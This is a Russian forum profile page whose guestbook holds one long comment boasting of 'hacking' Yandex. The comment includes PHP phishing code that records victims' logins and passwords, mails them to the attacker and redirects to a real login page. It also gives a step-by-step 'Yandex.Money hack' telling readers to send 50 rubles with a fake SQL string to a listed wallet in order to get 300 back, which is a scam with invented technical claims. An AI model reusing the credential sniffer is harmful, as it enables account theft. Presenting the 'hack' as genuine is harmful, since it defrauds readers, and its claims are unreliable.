Привет, Гость ! - Войти
- Зарегистрироваться
Персональный сайт пользователя 1020 : 1020 .www.nn.ru  
пользователь имеет статус «трастовый»
портрет № 61 зарегистрирован в 2001 году или ранее

1020

Портрет заполнен на 39 %

Отправить приватное сообщение Добавить в друзья Игнорировать Сделать подарок
популярность:
10891 место
рейтинг 2883 ?
Привилегированный пользователь 6 уровня



    Статистика портрета:
  • сейчас просматривают портрет - 0
  • зарегистрированные пользователи посетившие портрет за 7 дней - 0

Альбом комплиментов

Добавить комплимент. Все комплименты посетителей:
colnyshko 12.12.2010 в 19:19   «Ответить»
Весело, но непонятно. А следящие системы? Обязательно попробую.
spectrovodka 03.08.2010 в 19:28   «Ответить»
примите меня к себе в клуб)))
alex777555 28.02.2010 в 13:52   «Ответить»
«Как Все начиналось»

Два часа ночи, я был готов пойти спать, но надо было проверить почту. Зайдя к себе на мыльник (зарегистрирован я на яндекс.ру), я увидел огромное кол-во спама. Долбаный антиспам, установленный на yandex.ru , работает дерьмово, видимо спам - подарок от яндекс .ру. Что ж, как никак Новый Год скоро, надо тоже сделать подарок любимому почтовику))
Исследовав почтовый сервис я так ничего и не нашел. Что же, поищем через гугль. Так как у яндекса есть много других сервисов помимо почтового, в строке запроса я написал: site:*yandex.ru. В ответ гугль вывалил 214 000 000 страниц урлов (к счастью половина была повторных, иначе я бы лежал в психушке ). Я налил себе кофе и начал проверять сервисы. Web-кодеры yandex.ru хорошо поработали, так как после 2-х часового аудита не было найдено ни одной уязвимости. На данный момент были учтены некоторые глюки сервиса 7ya.yandex.ru , при просмотре картинок выскакивало popup окно, запомнив адрес: Я очень удивился и обрадовался, потому что выскочило окошко, которое означало одно - target никак не фильтруется. Было решено создать фэйк страницу авторизации, чтобы был баг и робот яндекса присылал мне пароль от яндекс карты. Было уже 5 часов утра, даже после 5 кружек кофе хотелось спать (а еще больше хотелось в туалет ). Поэтому я попросил своего хорошего знакомого продолжить начатое мною дело. На следующий день (т.е. на этот же ) на аську пришла мессага. Он создал фэйк форму, а также составил ядовитый урл:
на нашу фэйк форму′</script>
В таком виде этот урл сильно палился, поэтому мы немного замаскировали его, чтобы админы яндекса чувствовали себя сухо и комфортно . Далее был написан небольшой сниффер, который принимал переданные значения, записывал их в файл и перекидывал пороль карты на мыло , вот код сниффера:
<?
$adminmail = ″mymail@yandex ru″;
function email($to,$mailtext) {
mail($to,′password′,$mailtext,$adminmail);
}
$text=″[″.date(″d.m.y H:i″).″]Login: $_POST[login] Password: $_POST[pass]\r\n″;
email($adminmail,$text);
flock($file,3);
fputs($file, $text);
flock($file,1);
fclose($file);

echo ″<FORM id=′auth′ action=′http://talk.mail.ru/login.html′ method=post>
<INPUT type=hidden name=login value=′$_POST[login]′>
<INPUT type=hidden name=pass value=′$_POST[pass]′>
<script>auth.submit();</script>
</FORM>″;
?>
Создание фэйка - это совсем не сложно, сохраняем пагу к себе на винт и редактируем параметр action тега form. В итоге данные, которые ввел юзер, запишутся к тебе в файл и произойдет редирект, удивленный админ решит, что произошли какие-нить сбои в работе службы DNS. После этого мы создали баг к кошельку
Для проверки проделанной работы мы кинули 50 руб на этот номер кошелька 41001262171281
И на мой кошель минут через 5 пришло 300 руб. Это конечно очень мало бабла ведь столько работы было проделано. И мы с моим другом решили еще раз протестировать наш баг и кинуть 200 руб ну обратно нам так не чего и не пришло. Я долго думал в чем была наша промашка. И мы решили повторить операцию, еще раз кинули 50 рублей . И я не поверил своим глазам баг не исчез =) Запрос к БД на число 50 по введённым критериям совсем не фильтровался на спецсимволы!!! Абсолютно!!! Моя радость увеличилась, когда увидел что на мой кошель пришли опять 300 рублей. Как видишь, даже раскрученный проект имеет ошибки.

″Как выполнить взлом яндекс денег на своем компе″

1. Для начала проходим сюда yandex.ru

2. Заводим почтовый ящик

3. Заводим яндекс счет

4. Ложем на свой яндекс счет денег . Ну вам для этого взлома понадобиться 50 рублей

5. Теперь нажимаем перевести и переводим сумму не больше не меньше а ровно 50 рублей

6 Переводим на этот счет 41001262171281 где мы сделали баг

7. Где сообщение получателю пишем вот это:

[color=gray]SELECT COUNT(DISTINCT cc.content_id) FROM cache_content as cc, cache_content_region as r, cache_content_num as n WHERE cc.content_group = ′melody′ AND cc.content_type = ′melody_mp3′ AND r.content_id = cc.content_id AND n.content_id = cc.content_id AND r.region_id = ′9′ AND n.model_id = «41001262171281» AND singer_id = ′300′′

Там где написано id = «0»
Меняем значения «0» на свой номер кошелька
Вот пример :
id = «41001493134589»

8. В название платежа пишем это:
cc.content_id

9. И потом жмем перевести

10. Все дело сделано ждем минут 5 и к вам должны прийти 300 рублей. Надеюсь подробно объяснил. Проверена это уже на многих компах так что дерзайте.

Вы не авторизованы!
Чтобы написать комплимент необходимо войти или зарегистрироваться